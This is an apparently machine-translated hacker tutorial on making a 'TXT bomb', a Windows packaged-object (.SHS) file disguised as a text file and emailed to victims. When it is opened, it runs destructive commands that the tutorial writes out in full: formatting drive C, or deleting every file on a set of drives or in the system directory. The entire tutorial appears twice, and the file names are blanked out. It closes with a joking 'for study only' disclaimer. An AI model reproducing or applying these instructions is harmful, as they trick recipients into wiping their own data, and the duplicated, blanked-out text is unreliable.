A few days ago, I published an article in Heibai entitled "Little Bird Teach Little Birds to Make TXT Bombs", which received strong recommendations from many enthusiastic netizens. Shaoyan expressed his deep gratitude here! Because time was rushed at that time, there were still some problems with the "bomb bomb". After some modifications, some original bugs were fixed and tested in the 2nd edition of 98 and 2000 server versions. And the original bomb was divided into three bombs with different powers and executed separately.
Next, I will teach you the improved TXT bomb production method: 1. Create a text file that contains only one space (to reduce the file size) and name it at will.
2. Open the {wordboard document} and drag and drop this file into the {wordboard document}. You can also click "Insert\Object" in the single column of the {Writing Board Document} to pop up the "Insert Object" dialog box, select "Create from File", and then click the "Browse" button to select the file to be inserted.
3. Select the icon of the insert object and select "Edit\Package Object\Edit Package" in the menu bar (as shown in Figure 1). In the pop-up "Object Wrapper" dialog box, select "Edit\Command Line" in the menu bar, and then enter the following command: /m format c:/q /autotest /u, click "OK". At this time, the command content will be displayed in the content bar.
4. Click the "Insert Icon" button in the Appearance Bar, and a warning dialog box will pop up, confirm, and then select any icon.
5. Select "Edit\Volume Label" in the menu bar and give a name for this embedded object (which will replace the original file name). Click Update in the File menu and close the dialog box.
6. Drag and drop the newly created embed object onto the desktop. The default name of the file is "Fragment" (the default name under 2000 is "Fragment"), and now we change it to "". Open an email program to issue "" on the desktop as an attachment, or to issue a document containing an embedded object (with malicious commands) as an attachment.
7. When the email recipient mistakenly opens the "" file as "" (as mentioned above, the ".SHS" extension is always hidden) with confidence, or when opening the file, a malicious command is triggered when clicking on the embedded object in the file (the DOS run window pops up and executes the format command). If the above command is replaced by: /m deltree /y a:\*.* c:\*.* d:\*.*, it will delete all files on the other party's hard disk (driving letters are customized according to the actual situation); if it is replaced by: /m deltree /y c:\windows\system\*.*, it will delete all files under the other party's c:\windows\system\ directory. (Of course you can change it to other commands)
It's really simple. Just such a malicious attack program was created, it's so terrible!
(Remember: It is for study and research only, and do not use it to attack others, and do not execute the above files without safe preparation, haha!)
Original file download address:./
Next, I will teach you the improved TXT bomb production method: 1. Create a text file that contains only one space (to reduce the file size) and name it at will.
2. Open the {wordboard document} and drag and drop this file into the {wordboard document}. You can also click "Insert\Object" in the single column of the {Writing Board Document} to pop up the "Insert Object" dialog box, select "Create from File", and then click the "Browse" button to select the file to be inserted.
3. Select the icon of the insert object and select "Edit\Package Object\Edit Package" in the menu bar (as shown in Figure 1). In the pop-up "Object Wrapper" dialog box, select "Edit\Command Line" in the menu bar, and then enter the following command: /m format c:/q /autotest /u, click "OK". At this time, the command content will be displayed in the content bar.
4. Click the "Insert Icon" button in the Appearance Bar, and a warning dialog box will pop up, confirm, and then select any icon.
5. Select "Edit\Volume Label" in the menu bar and give a name for this embedded object (which will replace the original file name). Click Update in the File menu and close the dialog box.
6. Drag and drop the newly created embed object onto the desktop. The default name of the file is "Fragment" (the default name under 2000 is "Fragment"), and now we change it to "". Open an email program to issue "" on the desktop as an attachment, or to issue a document containing an embedded object (with malicious commands) as an attachment.
7. When the email recipient mistakenly opens the "" file as "" (as mentioned above, the ".SHS" extension is always hidden) with confidence, or when opening the file, a malicious command is triggered when clicking on the embedded object in the file (the DOS run window pops up and executes the format command). If the above command is replaced by: /m deltree /y a:\*.* c:\*.* d:\*.*, it will delete all files on the other party's hard disk (driving letters are customized according to the actual situation); if it is replaced by: /m deltree /y c:\windows\system\*.*, it will delete all files under the other party's c:\windows\system\ directory. (Of course you can change it to other commands)
It's really simple. Just such a malicious attack program was created, it's so terrible!
(Remember: It is for study and research only, and do not use it to attack others, and do not execute the above files without safe preparation, haha!)
Original file download address:./